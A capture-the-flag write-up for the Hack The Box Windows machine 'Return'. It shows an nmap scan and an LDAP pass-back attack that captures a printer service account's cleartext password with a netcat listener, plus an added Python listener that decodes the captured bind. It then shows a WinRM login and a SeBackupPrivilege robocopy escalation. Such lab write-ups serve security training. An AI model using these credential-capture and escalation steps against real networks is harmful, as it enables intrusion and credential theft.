Return
Windows · Easy - Adventure mode
🔭 Reconnaissance:
└─$ nmap -p- -sSVC --min-rate 5000 10.129.95.241
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 22:46 +0200
Nmap scan report for 10.129.95.241
Host is up (0.041s latency).
Not shown: 65510 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-03-31 21:05:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49681/tcp open msrpc Microsoft Windows RPC
49697/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-03-31T21:06:52
|_ start_date: N/A
|_clock-skew: 18m34s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.91 seconds
┌──(pmartinezr㉿kali)-[~]
└─$ crackmapexec smb 10.129.95.241
SMB 10.129.95.241 445 PRINTER [*] Windows 10 / Server 2019 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
It stands out that the host looks like a printer: the hostname is PRINTER and port 80 serves an "HTB Printer Admin Panel".
So we connect to the web service and a printer configuration page appears.
└─$ netcat -nvlp 389
listening on [any] 389 ...
connect to [10.10.14.154] from (UNKNOWN) [10.129.95.241] 52940
0*`%return\svc-printer�
1edFg43012!!
We change the settings so the LDAP server field points to our IP, leave a netcat listening on the default LDAP port (389) and receive the password 1edFg43012!! The unprintable bytes in the capture are the BER tag and length bytes of an LDAP BindRequest: the printer authenticates with a simple bind, so the bind DN return\svc-printer and the password travel in the clear to whatever host is configured as the LDAP server. Had the device used a SASL bind (Kerberos/NTLM) instead, no cleartext password would have been recoverable this way.
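The following Python script is an added example, not part of the original write-up or of any tool used in it. It decodes a raw LDAP BindRequest PDU like the one netcat dumped above (the visible `0*` and `` `% `` characters are the SEQUENCE and BindRequest tag/length bytes, and the 0x0c length byte in front of the 12-character password is a form feed, which is most likely why `nc` printed the password on its own line) and can optionally listen on 389 the way `netcat -nvlp 389` did, printing the credentials decoded instead of as garbled bytes. The sample PDU is constructed to match the printable characters of the capture; the message ID (1) and protocol version (3) are assumptions.

```python
"""Decode the LDAP simple BindRequest a device sends during an LDAP pass-back.

Added example for this write-up, not code from the original page. The sample
below is CONSTRUCTED to match the printable parts of the netcat capture
("0*`%return\\svc-printer" and "1edFg43012!!"); message ID and version assumed.
"""
import socketserver
from typing import Tuple

# LDAPMessage { messageID 1, BindRequest { version 3, name, simple password } }
SAMPLE_BIND = (
    b"\x30\x2a"                          # SEQUENCE, 42 bytes      -> shows as "0*"
    b"\x02\x01\x01"                      # messageID INTEGER 1     (assumed)
    b"\x60\x25"                          # [APPLICATION 0] BindRequest, 37 bytes -> "`%"
    b"\x02\x01\x03"                      # version INTEGER 3       (assumed)
    b"\x04\x12" b"return\\svc-printer"   # name OCTET STRING, 18 bytes
    b"\x80\x0c" b"1edFg43012!!"          # [0] simple password, 12 bytes (0x0c = form feed)
)


def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Read one BER TLV starting at buf[pos]; return (tag, value, next_pos).

    Handles short-form and definite long-form lengths (LDAP forbids indefinite).
    """
    if pos + 2 > len(buf):
        raise ValueError("truncated: missing tag or length")
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                    # long form: low 7 bits = number of length bytes
        n = length & 0x7F
        if n == 0 or pos + n > len(buf):
            raise ValueError("bad long-form length")
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    end = pos + length
    if end > len(buf):
        raise ValueError("truncated: value shorter than declared length")
    return tag, buf[pos:end], end


def parse_bind_request(pdu: bytes) -> dict:
    """Parse one LDAPMessage carrying a BindRequest into a dict."""
    tag, body, _ = read_tlv(pdu, 0)
    if tag != 0x30:
        raise ValueError(f"expected LDAPMessage SEQUENCE (0x30), got 0x{tag:02x}")
    tag, msgid, pos = read_tlv(body, 0)
    if tag != 0x02:
        raise ValueError("expected messageID INTEGER")
    tag, op, _ = read_tlv(body, pos)
    if tag != 0x60:
        raise ValueError(f"not a BindRequest (protocolOp tag 0x{tag:02x})")
    tag, version, pos = read_tlv(op, 0)
    if tag != 0x02:
        raise ValueError("expected version INTEGER")
    tag, name, pos = read_tlv(op, pos)
    if tag != 0x04:
        raise ValueError("expected bind name OCTET STRING")
    tag, auth, _ = read_tlv(op, pos)
    info = {
        "message_id": int.from_bytes(msgid, "big", signed=True),
        "version": int.from_bytes(version, "big", signed=True),
        "name": name.decode("utf-8", "replace"),
    }
    if tag == 0x80:                      # simple authentication: cleartext password
        info["auth"] = "simple"
        info["password"] = auth.decode("utf-8", "replace")
    elif tag == 0xA3:                    # SASL: only the mechanism name is recoverable here
        _, mech, _ = read_tlv(auth, 0)
        info["auth"] = "sasl"
        info["mechanism"] = mech.decode("utf-8", "replace")
    else:
        raise ValueError(f"unknown authentication choice 0x{tag:02x}")
    return info


class BindCapture(socketserver.BaseRequestHandler):
    """Read the first PDU from a connecting device and print the parsed bind."""

    def handle(self) -> None:
        data = self.request.recv(4096)
        try:
            print(f"[+] {self.client_address[0]}: {parse_bind_request(data)}")
        except ValueError as exc:
            print(f"[-] {self.client_address[0]}: {exc} (raw: {data!r})")


def serve(host: str = "0.0.0.0", port: int = 389) -> None:
    """Listen like `netcat -nvlp 389`, but decode. Port 389 needs root/CAP_NET_BIND_SERVICE."""
    socketserver.TCPServer.allow_reuse_address = True
    with socketserver.TCPServer((host, port), BindCapture) as srv:
        srv.serve_forever()


if __name__ == "__main__":
    print(parse_bind_request(SAMPLE_BIND))
```

Run it with no arguments to decode the constructed sample; call `serve()` as root to replace the netcat listener. The device only needs to send its BindRequest for the credentials to be exposed, so no BindResponse is ever returned.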
└─$ evil-winrm-py -i 10.129.95.241 -u svc-printer -p '1edFg43012!!'
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.5.0
[*] Connecting to '10.129.95.241:5985' as 'svc-printer'
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
arc4 = algorithms.ARC4(self._key)
evil-winrm-py PS C:\Users\svc-printer\Documents> dir
evil-winrm-py PS C:\Users\svc-printer\Documents> cd ..
evil-winrm-py PS C:\Users\svc-printer>
evil-winrm-py PS C:\Users\svc-printer> dir Desktop
Directory: C:\Users\svc-printer\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/31/2026 2:04 PM 34 user.txt
evil-winrm-py PS C:\Users\svc-printer> cd Desktop
evil-winrm-py PS C:\Users\svc-printer\Desktop> type user.txt
a337a7858e99cf5879********
Now we can use the password to log in over WinRM (port 5985) with evil-winrm and obtain the first flag.
👽 Actions:
evil-winrm-py PS C:\users\svc-printer\Documents> whoami /all
USER INFORMATION
----------------
User Name SID
================== =============================================
return\svc-printer S-1-5-21-3750359090-2939318659-876128439-1103
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= =================================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemtimePrivilege Change the system time Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
evil-winrm-py PS C:\users\svc-printer\Documents> robocopy /b c:\Users\Administrator\Desktop c:\users\svc-printer\Documents
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Wednesday, April 1, 2026 3:06:48 AM
Source : c:\Users\Administrator\Desktop\
Dest : c:\users\svc-printer\Documents\
Files : *.*
Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
2 c:\Users\Administrator\Desktop\
*EXTRA Dir -1 c:\users\svc-printer\Documents\My Music\
*EXTRA Dir -1 c:\users\svc-printer\Documents\My Pictures\
*EXTRA Dir -1 c:\users\svc-printer\Documents\My Videos\
*EXTRA File 97280 chimi.exe
*EXTRA File 184973 nc.exe
*EXTRA File 11 query
New File 282 desktop.ini
0%
100%
New File 34 root.txt
0%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 3
Files : 2 2 0 0 0 3
Bytes : 316 316 0 0 0 275.6 k
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Ended : Wednesday, April 1, 2026 3:06:48 AM
evil-winrm-py PS C:\users\svc-printer\Documents> type root.txt
6aaae37caf067f3f6f********
evil-winrm-py PS C:\users\svc-printer\Documents>
The svc-printer user is a member of BUILTIN\Server Operators, a group that grants two privileges worth noticing:
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
These let us back up any file or directory on the system regardless of its ACL, so we can grab root.txt with robocopy /B (backup mode), which opens the source files with backup semantics using SeBackupPrivilege. The copy lands in svc-printer's Documents folder, where we read it normally. Note in the robocopy output that desktop.ini is copied along with root.txt, and that the destination already held nc.exe, chimi.exe and query, artifacts left by other players on a shared lab box, which is worth keeping in mind before trusting anything found on disk.
This post is licensed under CC BY 4.0 by the author.